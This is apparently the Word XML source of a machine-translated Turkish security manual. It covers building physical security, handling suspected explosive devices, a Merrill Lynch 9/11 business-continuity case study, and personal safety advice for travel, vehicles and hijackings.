fiziksel güvenlik yapılandırması, kapıları içeriden kilitlemeli ve yürütme alanına yalnızca bir ziyaretçi erişim kapısına sahip olmalıdır. Kilitli kapıların panik çubukları da ol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rganizasyonun faaliyetlerinin niteliğine bağlı olarak, belirli bir ofisteki konum ve fonksiyondan dikkat çekmek için birkaç ofise erişimi kontrol eden geniş bir bekleme alanı gibi aldatma önlemleri alınabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Toc7996898"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">16. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fiziksel Güvenlik Önlemleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>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şağıdaki güvenlik cihazlarını kurmayı düşünün: hırsız alarm sistemleri (tercihen merkezi bir güvenlik tesisine bağlı), sonik uyarı cihazları veya diğer izinsiz giriş sistemleri, dış projektörler, kapılarda sürgü kilitleri, pencerelerde kilitler ve demir ızgaralar veya pencereler için ağır perde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sisin yapısına bağlı olarak, 15-20 ayak çit veya duvar ve kapsamlı bir dış aydınlatma sistemi kurmayı düşünün. Dış aydınlatma yasadışı girişe en ucuz ve en etkili engellerden biri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urcalamayı zor ve farkedilir kılmak için aydınlatma armatürlerini yerle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röristler ve diğer davetsiz misafirlere, özellikle de girişlere yakın olanlara kapalı veya gizli bir yaklaşım yolu bulunmadığından emin olmak için gerekçeleri kontrol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gın kaçışlarına, merdivenlere ve çatılara dıştan erişimi engel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nın yakınındaki rögar kapakları emniyete alınmalı veya kilitlenmeli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ış mekan açıklıklarını örtün, kilitleyin veya ekranlayın (örneğin, kömür kutuları, havalandırma kanalları, erişim nokta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Camlar (özellikle zemine yakın veya bitişik binalardan erişile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atlama durumunda uçan camın etkilerini azaltmak için pencerelere ince ve şeffaf bir plastik tabaka eklemeyi düşünü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odrum ve diğer nadir kullanılan alanlar dahil, tüm binanın içini düzenli olarak ince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 dışı çöp konteynırlarını, depolama kutularını ve bisiklet raflarını binadan uzağa yerle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itap depoları veya posta yuvaları binaya bitişik veya bina içinde olma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osta kutuları binaya yakın olma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oşlukların üst kısmını ve dolapların, kitaplıkların ve vitrinlerin üzerindeki açık alanları kapa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pıcı dolapları, servis açıklıklarını, telefon dolaplarını ve elektrikli dolapları her zaman kilitli tutun. Haberleşme dolaplarını ve kullanım alanlarını bir alarm sistemiyle koruy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yrılmış park yerlerinden adları kaldır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Çöp haznelerini günlük olarak boşaltın (tercihen günde iki ke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Çalışma düzeninde ve hazır olduklarından emin olmak için tüm yangın söndürücüleri düzenli olarak kontrol edin. Çalışma düzeninde olduklarından emin olmak için tüm duman alarmlarını periyodik olarak kontrol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ersonel İşlem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da çalışan personelin artan farkındalığını vurgulayın, çünkü etkili bina güvenliği büyük ölçüde insanların davranışlarına ve farkındalığına bağ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Personel güvenliği prosedürleriyle ilgili açık talimatlar geliştirmek ve yay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 sakinleri için düzenli güvenlik brifingleri düzen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ersonel güvenlik önlemlerini, uygun müdahaleleri anlamalı ve acil durumlarda kiminle iletişim kuracağını bilmeli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Uygunsa tatbikat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ıdemli personel rutin olarak geç saatlere kadar çalışmamalıdır. Hiç kimse yalnız çalışmamal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personele, özellikle sekreterlere, bomba tehditleriyle ve haraç telefon görüşmeleriyle ilgili özel eğitimler ve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 telefonda bir bomba tehdidi kontrol listesi ve bir kalem veya kurşun kalem bulunduğundan emin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nterkom, telefon ve zorlama alarm sistemleri bulunan üst düzey personel, sekreter ve güvenlik personeli arasında güvenli iletişim sistemlerinin varlığını sağlama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rincil iletişim sistemlerinin başarısız olması durumunda alternatif bir iletişim aracı (örneğin, iki yönlü telsiz) gel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önderen veya kaynak olumlu olarak bilinmediği sürece binalarda paket veya büyük zarflar açmayın. Şüpheli bir paketin güvenlik personelini bilgilen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osta odası personelinin bomba saptama işlemlerinde ve denetiminde eğitilmesini sağ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8 Yapı Güvenliği Kontrol Listesi (deva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kapıları gece, hafta sonları ve bina gözetimsiz olduğunda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ahtarların sıkı kontrolünü sağlayın. Kullanılmadığı zaman dolapları ve dolapları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Uygun olduğunda, kullanılmadığında tüm bina dinlenme odalarını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daki ziyaretçilere eşlik edin ve giriş isteyen yabancıların tam kontrolünü sağ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bul etmeden önce kapıcıları ve ekipmanlarını kontrol edin ve işlevlerini yerine getirirken gözlem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Resmi evrakları yetkisiz görüşlerden koruy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ozitif olarak tanımlanmadıkça ve bu bilgiye ihtiyaç duymadıkça bina personelinin yerini arayanlara açıkla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lefonla bilgi verirken çok dikkatli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sim pozisyonları ve özellikle ofis personelinin ev adreslerini veya telefon numaralarını yabancılara veya telefon arayanlara verme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röristlerin potansiyel terör hedeflerinin adreslerini ve telefon numaralarını, kitap ve liste halinde listele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eyahat planlarını veya tarifeleri ziyaretçilerin huzurunda tartışmakta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Faaliyetleri gözlemlemek ve bilgi toplamak için kendilerini binaya yerleştirebilecek kamu görevlisi ekipleri olarak gizlenmiş insanlara karşı dikkatli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ark girişine veya terkedilmiş araçlara, özellikle binanın girişine yakın veya duvarların yakınında bulunan kamyonlara dikka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araçların plaka numaralarını, markalarını, modellerini, yıllarını ve rengini ve yolcu tanımını not edin ve bu bilgileri amirinize, güvenlik görevlisine veya kanun uygulayıcı kurumunuza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iriş kontrolü</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Ziyaretçilere kapı açılmadan önce giriş kapılarına bir gözetleme deliği, interkom, görüşme ızgarası veya küçük bir açıklık takmayı düşünü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Ziyaretçilerle ilgilenmek için bir resepsiyon odası kullanın, böylece iç ofislere erişimini kısıt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etal giriş cihazlarının kontrollü girişlere kurulmasını düşünün. Organizasyon dışı üyelerin binaya kutu ve paket getirmelerini yasak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 alanı, kaydedilmemiş ziyaretçilerin resepsiyon görevlisinin görsel gözleminde olması ve ziyaretçilerin sıkı erişim kontrolü prosedürlerini takip etmesini sağlamak için düzen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nanın erişim kontrol sisteminde istisnalar yap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nterkomlar, erişim kontrol rozetleri veya kartlar ve kapalı devre televizyon kullanımıyla daha iyi güvenlik sağlamak için erişim kontrol sistemlerini yükselt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mu alan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saksı bitkilerini ve süs eşyalarını ortak alanlardan kaldır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Çöp haznelerini sık sık boşal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ervis alanlarına kapıları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avan pencereleri dahil tavan veya zemindeki trapdoors'ları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obilya ve diğer eşyaların yapım veya yerleştirilmesinin patlayıcı cihazları veya silahları gizlememesini sağ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obilyaları duvarlardan veya köşelerden uzak tut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erdeleri, perdeleri veya kumaş örtülerini, gizlenmiş öğelerin kolayca görülebileceği şekilde değ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üksek dolapların, rafların veya diğer donanımların üst kısımlarındaki kut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Umumi dinlenme odalarında özel önlemler al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ylı kapılara yaylı yatakları dinlenme odalarına yerleştirin, böylece kilitlenmediklerinde açık dururlar. Birinin kilitli bir ahırda bir cihazı gizlemesini önlemek için durakları bir iç mandalla dona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omodin su depolarındaki üst kısımlara sabit bir kaplama yerle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Kirli havlular için açık örgülü sepet kullanın. Sık sık boşal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muya açık alanlardaki muhafızların, tehlike dairesini sessizce uyarma ve yardım toplama (örneğin, ayakla çalıştırılan zil) gibi bir yolu olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Toc7996899"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">17. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Şüpheli Patlayıcı Bir Aygıtın Keşfi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FB4935"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bir nesneye dokunmayın veya hareket ettirmeyin. Birinin nesnenin varlığını hesaba katması mümkünse, o kişiden sözlü bir açıklama ile tanımlamasını isteyin. Tahliye edilen personeli bölgeye geri getirmeyi gerektiriyorsa, bu yapılmamalıdır. Bir nesnenin varlığı açıklanamaz kalırsa aşağıdaki işlemleri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ama ekibi dahil binaları ve çevresindeki alanları boşal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ahliye edilen alanlar şüpheli nesneden en az 100 metre uzakta ol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r kordon ve olay kontrol noktası veya ICP oluştur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üvenlik Yönetim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8 Yapı Güvenliği Kontrol Listesi (deva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CP'ye bir nesnenin bulunduğunu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orgulanana kadar nesneyi yerleştiren kişiyi ICP'de tut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nesneleri en az 100 metre mesafeye Cordon ve şüpheli araçları en az 200 metre mesafeye kordonlayın. Kimsenin kordonlu alana girmediğinden emin olun. Ulaşımı kontrol etmek ve varışta ICP sorumluluğunu kolluk makamlarına bırakmak için kordon üzerinde bir ICP oluşturmak. Kolluk kuvvetleri incelemelerini tamamlayana kadar kordonu koruyun ya da kordonun durduğunu belirtin. Tahliye edilen bir tesisin yeniden başlatılmasına izin verilmesi kararı tesisten sorumlu olan kişiye aitt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oney’in takımı, bir yıl boyunca ortalama olarak yaklaşık 70 acil duruma yanıt veriyor. Dünyanın dört bir yanındaki tesisler ve perakende şubeleri, deprem, fırtına, elektrik kesintileri, sel veya bomba tehdidi gibi çeşitli olaylarla karşılaşmakta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oney’in ekibi iş kesintisini planladığında, ekip iş gruplarına tesislerine erişimi olmayan ve doğal olarak bir kesinti için mümkün olan en kötü zamanda altı haftalık en kötü senaryoyu planlamalarını söylemekte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lanlama aynı zamanda, herhangi bir binadan - bilgisayarlardan, dosyalardan, evraklardan vb. Hiçbir şeye kesinlikle erişememeyi de içeriyor. “İnsanları alternatif siteler, hayati kayıtlar, personelin fiziksel olarak yer değiştirmesi vb. Hakkında düşünmeye zorluyoruz. teknolojinin başka bir sitede mevcut olduğundan emin olmak, ”diyor Honey.</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2K Sonrası Geliştirilmiş Planlar ve Prosedür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Merrill Lynch, Federal Reserve ve Federal Finansal Kurumlar Sınav Konseyi gibi düzenleyici kurumlar tarafından belirlenen standartlara uymak zorundadır. Honey, “Merrill Lynch gibi şirketlerin çok sağlam acil durum planları olacağına dair bir piyasa beklentisi var, bu yüzden muhtemelen ona saldırıyoruz v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Orada olan herhangi bir yasal düzenleme şartının üstünde. ”BCP ekibi, yasal düzenlemeleri aşma konusundaki son çabaları Merrill Lynch'i 11 Eylül saldırılarından başarıyla kurtulmak için iyi bir konuma getir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Acil Durum Planlarının Kapsamlı Testi Tüm planlar yılda iki kez test edilir ve yılda bir kez, büyük ölçekli şirket planları test edilir. Honey’in ekibi, merkezin tahliye planını yılın başlarında yeniledi. Yeni prosedürlerle yaklaşık 8000 pankart dağıtdılar. Bu pankartlar saldırı günü oldukça faydalı oldu. Ayrıca, şirketin insan kaynakları veritabanı, ekibin iş sürekliliği planlamasına aylık olarak indir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azılım programı. Bu, BCP ekibinin her binadaki mevcut tüm çalışanların sıkça güncellenen bir listesine sahip olmasını sağlar. Tüm bu hazırlık işlemleri, 11 Eylül'de iş sürekliliği planlarının etkili bir şekilde yürütülmesine neden old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st Saldırılara Benzer Bir Senaryo Kullanarak Son Test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Mayıs 2001’de, Bal’ın ekibi merkezin kilit personeli için iki günlük bir planlama senaryosu düzenledi. Bu senaryo, 11 Eylül'den farklı olmasına rağmen, New York'taki büyük bir kasırga olan yıkıcı bir etki olayı ele aldı. “Kasırga senaryosu hayat kaybı açısından 9/11 trajedileriyle karşılaştırmasa da, şirketimizi aslında taşımacılıkta zorluklar açısından firmayı daha fazla etkileyen, oldukça kapsamlı iki günlük bir senaryoya soktuk. ve bölgedeki gerçek hasar, ”diyor Bal. “Yani biz gerçekten çok öyleydi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yi hazırlanmış; zaten birçok lojistik, teknoloji ve İK tipi konu hakkında düşünen birçok insanımız vardı. ”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc7996900"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">17.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tahliye</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>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urumsal müdahale ekibi sabah saat 8: 55'te aktive olurken, Bal Kanal Caddesi'ne doğru yola çıktı. Tüm işletme destek gruplarından temsilcilerden oluşan ekip, bina yönetimi, fiziksel güvenlik personeli, medya ilişkileri, kilit teknoloji kaynakları ve kilit işletme birimleri gibi durumun değerlendirilmesinde etkilidir. Alandaki çok sayıda telekomünikasyon sorununa rağmen, ekip nihayet neler olduğunu anlamak için New Jersey, Jersey City'deki diğer komuta merkezi ile iletişim kurmak için 9: 30'da bir konferans araması yap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oney, “Gördüğümde garip görünüyor, ancak binalara vuran uçakların dışında, bunun bir kaza mı yoksa terörist bir saldırı mı olduğunu bilmiyorduk” diyor. “Gerçekten de, o zamanki zorluk çalışanlarımızı hesaba katmak ve sonra ne olduğunu anlamaya çalışmaktı. Binalarımıza verilen zarar da bir endişe kaynağıydı. Binalarımız nasıldı? Hala ayakta mıydılar? Altlarındaki altyapının durumu neydi?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Çalışanlarla iletişime geçmek için çağrı ağaçları kullanılmış ve çalışanlar, bölgeden güvenli bir şekilde çıktıklarını bildirmek için yöneticileriyle nasıl iletişim kuracaklarını da biliyorlardı. Honey, “Bir binanın tipik bir tahliyesinde, çalışanlar binadan 100 metre uzaktadır ve isimlerinin listeden çıkarılmasını beklemektedir” diyor. “Burada karşılaştığımız konu, aşağı Manhattan'ın tamamının boşaltılması. Böylece çalışanlar eve gidiyor ya da başka ofislere gitmeye çalışıyorlardı - bu bizim için zor bir işti. ”Honey, anahtar çalışanların taşıdığı cüzdan kartlarının son derece yararlı olduğunu söylü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kes kimi ve ne zaman arayacağını biliyordu” diyor. “Bu olması gereken çok değerli bir planlama yardımcısıyd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Ekip çağrı ağaçları ve diğer iletişim süreçlerini başlattıktan sonra, önceden tanımlanmış süreklilik planlarını uygulamaya ve ne zaman ve hangi kritik konulara odaklanmak istediklerini değerlendirmeye başlad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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Toc7996901"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">18. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Genel Güvenlik Prosedürleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FB4935"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ilenize ve ortaklarınıza, yabancılara kendiniz veya aileniz hakkında bilgi vermemesini sağ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lgi toplayıcılara gereksiz kişisel bilgiler vermekte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şadığınız ya da işyerinize yakın tüm şüpheli kişileri rapor edin; Polise veya güvenliğe şahsın ve / veya aracın tam bir tanımını yapmayı deneme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lışılmış kalıpları önlemek için günlük rutinde değişiklik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ümkünse, seyahat zamanlarını ve işe gidiş geliş rotalarını dalgalandır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ş yeriniz dışındaki yabancılarla buluşmayı reddetme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fisten veya evden ve tahmini varış saatinizden ayrılırken, gideceğiniz yerdeki ortaklara veya aile üyelerine her zaman tavsiyede bulun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bancılara kapı aç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ahtar telefon numaralarını ezberleyin - ofis, ev, polis, vb. Aile seyahat planları veya güvenlik önlemleri ve prosedürleri hakkında bilgi verirken dikkatli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urtdışına seyahat ediyorsanız, “Bir polise, doktora ihtiyacım var” gibi ana dilde birkaç önemli kelime öbeği öğrenin ve uygu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ş seyahat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vaalanı İşlem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rken varmak; şüpheli etkinlik için dikka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Uzaktan başkalarıyla göz temasını koruyan gergin yolculara dikkat edin. İnsanların neler taşıdığını gözlemleyin. Davranış, bölgedeki diğer davranışlarla tutarlı deği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rminalde nerede olursanız olun, saldırı durumunda kapak için uygun nesneleri belirleyin; sütunlar, çöp kutuları, valizler, büyük ekiciler, tezgahlar ve mobilyalar koruma sağlay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çık alanların yakınında oyalanmayın. Bekleme odalarına, ticari mağazalara ve restoranlara hızlıca geçiş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üvenlik kontrol noktalarında mümkün olan en kısa sürede iler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aldırganların gizlenmesini sağlayan tenha alanlarda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rminalin herhangi bir yerinde gözetimsiz bagajın farkında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Şahsi eşya taşıma konusunda son derece dikkatli olun. Dizüstü bilgisayarlar için tasarlanan evrak çantaları hırsızlığı dünyadaki havaalanlarında artmaktadır; Aynı şekilde, düzgün bir şekilde korunmayan bagaj, bir teröristin taşıma çantanıza istenmeyen bir nesne veya cihaz yerleştirmesi için bir fırsat sağlar. Mümkün olduğunca, hiçbir şeyi paketle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ybetmeyi göze alamaz; belgeler önemliyse, bir kopya çıkartın ve kopyayı taşı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agaj alanı bölgesini belli bir mesafeden izleyin. Kalabalık temizlenene kadar çantalarınızı geri almayın. Kalabalığın kenarındaki gümrük yollarına iler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faaliyeti havaalanı güvenlik personeline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erleşik İşlem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encere koltuklarını seçin; daha fazla koruma sağlarlar çünkü koridor koltukları korsanların koridordaki yukarı ve aşağı hareketlerine daha yakın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ka koltuklar da daha fazla koruma sağlar, çünkü genellikle kokpitin yakınında olan düşmanca eylem merkezinden daha uzaktadır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cil çıkıştaki koltuklar kaçma fırsatı sağlay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tel İşlem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da anahtarınızı her zaman kişinizin üzerinde tut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ölgede dolaşan şüpheli kişilere dikka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da numaranızı yabancılara ver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danızı ve kişisel efektlerinizi düzenli ve düzenli tutun; böylece kurcalanmayacak veya yerinde olmayan nesneleri göreceksiniz.</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cil durum çıkışlarının ve yangın söndürücülerin yerlerini bil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bancıları odanıza kabul et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tel güvenlik görevlilerinin yerini belirlemeyi bili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üşük Profilde Tut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ıyafetiniz, davranışlarınız ve tavırlarınız dikkat çekmemelid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erel çevreye uyum sağlamak için çaba göste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anıtımdan kaçının ve büyük gruplarda dışarı çık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ivil rahatsızlıklardan ve gösterilerden uzak dur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vde Aile İçin İpuç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vin anahtarını bulundurma kısıt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ahtarlar kaybolursa veya çalınırsa ve önceden işgal edilmiş bir eve taşınırken kilitleri değ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Garaj dahil bütün girişleri geceleri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vde olsanız bile evi kilitli tut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omşularınızla dostça ilişkiler gel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endine dikkat etme; komşularının saygılı olm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alkonlarda ve camların yakınında sıkça maruz kalmakta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üphelenme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kamet alanlarına erişim isteyen kamu görevlilerine dikkat edin; Girişe izin vermeden önce kimliklerini bir gözetleme deliğinden kontrol e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eyyar satıcılara ve yabancılara karşı dikkatli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araçların lisans numaralarını yazın; işgalcilerin açıklamalarını no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iğer aile üyelerinin yeri veya faaliyetleri hakkında sorularınız varsa şüpheli davra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şüpheli etkinlikleri polise ya da yerel yasa uygulayıcılara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Uzakta Olduğunuzda Güvenlik Önlem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vi canlı bir görünümle terk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eslimatları durdurun veya bir komşunun evine posta gönde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pılara notlar bırak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ahtarları evin dışına sakla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Farklı zamanlarda ve yerlerde ışıkları açmak ve kapatmak için bir zamanlayıcı (yerel elektriğe uygun) kulla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Radyoyu açık bırakın (en iyi zamanlayıcı il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eğerli eşyalarınızı sak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Polise veya yokluğunuzun güvenilir bir komşusuna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onut Güvenli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ış zemin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sminizi ikamet veya posta kutunuzun dışına koy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yi aydınlat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l ile bitki örtüsü kontrolü saklanma yerlerini küçültme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iriş ve çıkış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ürgü kilitleri olan sağlam kapı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pıdaki tek yönlü gözetleme deli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şıklıklardaki çubuklar ve kilit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Cam kapılarda ve zemin kat pencerelerinde metal ızgara değil</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ışarıdan ulaşı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ç özellik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larm ve dahili telefon sistem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tfaiyeci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ıbbi ve ilk yardım teçhizat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iğer istenen özellik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klaşımların net bir görünümü</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rden fazla erişim yol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okak dışı par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üksek (altı ila sekiz fit) çevre duvarı veya çi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Otopark</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er zaman arabanızı kilitl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ümkünse gece boyunca sokakta bırak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Şüpheli kişileri kontrol etmeden asla çıkmayın. Şüpheniz varsa, uzaklaş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adece kontak anahtarını park görevlisi ile birlikte bırak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zlemek için orada olmadığınız sürece, bagaja girmenize izin ver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araj kapılarını asla açık veya açık bırak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Varsa, uzak bir garaj kapısı açacağı kullanın. Arabanıza kapalı garajın güvenliğine girin ve çık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old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acınıza girmek için binaları terk etmeden önce, şüpheli bir şey olup olmadığını belirlemek için çevreyi kontrol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oğa var. Aracınızdan çıkmadan önce aynı güvenlik durumunu göste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r araca binmeden önce altını kontrol edin. Kablolar, bantlar veya olağandışı herhangi bir şey ar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ümkünse, işe ve eve giden rotaları deği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ece yolculuklarında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kadaşlarınızla seyaha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ümkünse izole edilmiş yollardan veya karanlık sokaklardan kaçı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mniyet kemerleri takılı, kapılar kilitli ve camlar kapalıyken alışılmış şekilde sürüş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Aracınızın kutu içinde olmasına izin vermeyin; araçla aranızda en az sekiz fit aralık bırak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önünde; iç şeritlerden kaçının. Araba sürerken veya sürüş yaparken dikkatli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İzleniyorsanız Nasıl Tepki Vereceğinizi Bil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ürveyansın onaylanması için bloğu daire içine al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üzleşmeye yol açabilecek diğer eylemleri durdurmayın veya gerçekleştir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ve sür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aba ve yolcuların tarifini al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n yakın güvenli bölgeye gi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layı polise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 Saldırının Başlamasını İşaret Edebilecek Olayları Tanı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sikletçi aracınızın önüne düşü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ayrakçı veya arabanı durduran işç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ahte polis veya devlet kontrol noktas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olda engelli araç / kaza mağdur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ıradışı sapma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racınızın çarptığı bir kaz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izi içine alan arabalar veya yaya trafiğ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i aktivite veya silah ses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ir Araçta Saldırı Altında Ne Yapılacağını Bil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endinizi, yolcuları veya yayaları zarar vermeden maruz bırakmadan, korna çalarak aracınıza dikkat çekmeye çalış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iz ve izleyiciniz arasına başka bir araç yerleşt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emen dönüş ve kaçış yapmak; kaldırımı 30–45 derece açıyla, maksimum 35 mil / saat atl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erekirse ram engelleme arac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n yakın güvenli bölgeye gi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Olayı polise bildir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icari Otobüsler, Trenler ve Taksi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eğişken ticari ulaşım şekl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eşgul durakları seç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Daima aynı taksi şirketini kullan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 Tanımadığınız birisinin sizi belirli bir kabine yönlendirmesine izin ver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aksinin lisanslı ve emniyetli bir donanıma sahip olduğundan emin olun (en azından emniyet kemerler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hliyet üzerindeki sürücü ve resmin aynı olduğundan emin olu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Bir arkadaşınızla seyahat etmeye çalış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Mümkünse, taksinin izlemesini istediğiniz rotayı belirt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iyim</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urtdışında ticari taşıma kullanırken veya bir bağlantı kurmak iseniz koruyucu giysilerle seyahat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üksek riskli bir alanda ticari bir terminalde uçuş.</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BD tarafından tanımlanmış kovboy şapkaları veya botları, beyzbol şapkaları, Amerikan logo tişörtleri, ceketler vey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weatshir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örünür bir ABD bağlantılı dövmeniz varsa, uzun kollu bir tişört gi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Saldırı Yapılan İşlem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apak için dalın. Koşma. Koşmak şarapnel parçasının hayati organlara ya da kafaya vurma olasılığını arttır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areket etmeniz gerekirse, göbek taraması veya yuvarlanma. Kullanılabilir kapağı kullanarak zemine alçakta kal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l bombası görürseniz, zemin üzerine düz bir şekilde, ayakları ve dizleri el bombası ile birlikte tabanlarla birlikte sıkıca yerleştirin. Bund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ozisyonunuz, ayakkabılarınız, ayaklarınız ve bacaklarınız vücudunuzun geri kalanını korur. Şarapnel, koni içind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patlama, vücudunu geçiyo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kciğerlerinizi, kalbinizi ve göğsünüzü korumak için göğüs kafenizin yanına kollar ve dirsekler yerleştirin. Kulaklarını kapat v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llerinizi boynu, atardamarları, kulakları ve kafatasını korumak için kullan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Yanıt veren güvenlik personeli sizi saldırganlardan ayırt edemez. Onlara yardım etmeye çalışm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herhangi bir şekilde. Ayağa kalkması söylenene kadar du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açırıldıysa İşlemle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Sakin olun, kibar olun ve esirlerinizle işbirliği yap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Tüm hava korsanlarının aynı anda kendilerini açığa vurmayacaklarının farkında olun. Yalnız bir hava korsanı çıkarmak için kullanılabili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diğer hava korsanları tarafından nötralizasyon için güvenlik personel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Genel bir kimlik belirleme talebine cevaben turist pasaportunuzu teslim ed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içbir bilgi sunm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Ani vücut hareketleri, sözlü açıklamalar veya düşmanca bakışlarla kendinize dikkat çekmeyi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Kendinizi olası sözlü ve fiziksel istismar, yiyecek ve içecek eksikliği ve sağlıksız koşullar için hazırlay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İzin veriliyorsa, zamanınızı korumak için okuyunuz, uyuyun veya yazın.</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Elçilerinizi dikkatlice gözlemleyin ve fiziksel açıklamalarını ezberleyin. Ses kalıplarını ve dili dahil et</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giyim ve eşsiz fiziksel özelliklerin yanı sıra farklılık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 Herhangi bir kurtarma girişimi ile işbirliği yapın. Yükselmesini söyleyene kadar yere yat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="214" w:name="_Toc7996902"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">19. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kurtarma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="214"/>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Dakikalar İçinde Devam Eden Kritik Yönetim Fonksiyonlar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rketin kurtarma prosedürlerinin çoğu, bölgenin dışındaki Merrill Lynch tesislerindeki yedek veri merkezlerine dayanıyordu. Veri kurtarma prosedürleri olaysız takip edildi. Şirketin sıcak bir site sağlayıcısı var, ancak bu hizmeti kullanmak zorunda olmadıla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rketin Y2K için hazırlık çalışmaları, kritik verilerin rutin olarak kurtarılmasına neden oldu. Honey, “Çok büyük bir BT felaket kurtarma programına sahiptik” diyor Bal ve “Birkaç yıldan beri, işletme prosedürlerini gerçekten kullanmaya yönelik prosedürleri güçlendirmek için çalışıyoruz. Bu yüzden, yedekleme veri merkezleri, fiber kanallar üzerinden yansıtma, vb. - hepsi oldukça iyi sonuç verdi. ”Aynı şekilde, komuta merkezlerindeki kurtarma personeli için:“ Bir çok insan zaten bir komuta merkezinin ne olduğunu, neden orada olmak zorunda olduklarını biliyordu. ve onlar ne</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yapmamız gerekiyor, çünkü Y2K sırasında bunu yaşadık ve yaptığımız için minnettarım.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8000 Çalışan Bir Hafta İçinde İşe Geri Dönüyor BCP ekibinin en büyük zorluklarından biri, yerinden olmuş kişilerin işe geri dönmesi oldu. İlk olarak, şirket New Jersey'de iki kampüs tesisini kullanabildi. Şirket ayrıca emlak departmanını kalem haline getir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üç durumlu alanda bulunan her boş alan ve onu bir listeye koyun. Honey’in ekibi gereksinimleri topladı ve her bir iş birimine uygun alan tahsisini koordine etti. Şirket oldukça kapsamlı bir alternatif iş düzenleme programı yürütüyor, bu nedenle bazı çalışanların evden çalışmalarına izin verildi. En sonunda,</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Ekip, yurtdışındaki bazı işleri veya iş yükünün bir kısmını etkilenen çalışanlardan alan diğer Merrill Lynch ofislerine transfer edebildi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Toc7996903"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">19.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Normal İşlemlere Devam Etme</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FB4935"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lastRenderedPageBreak/>
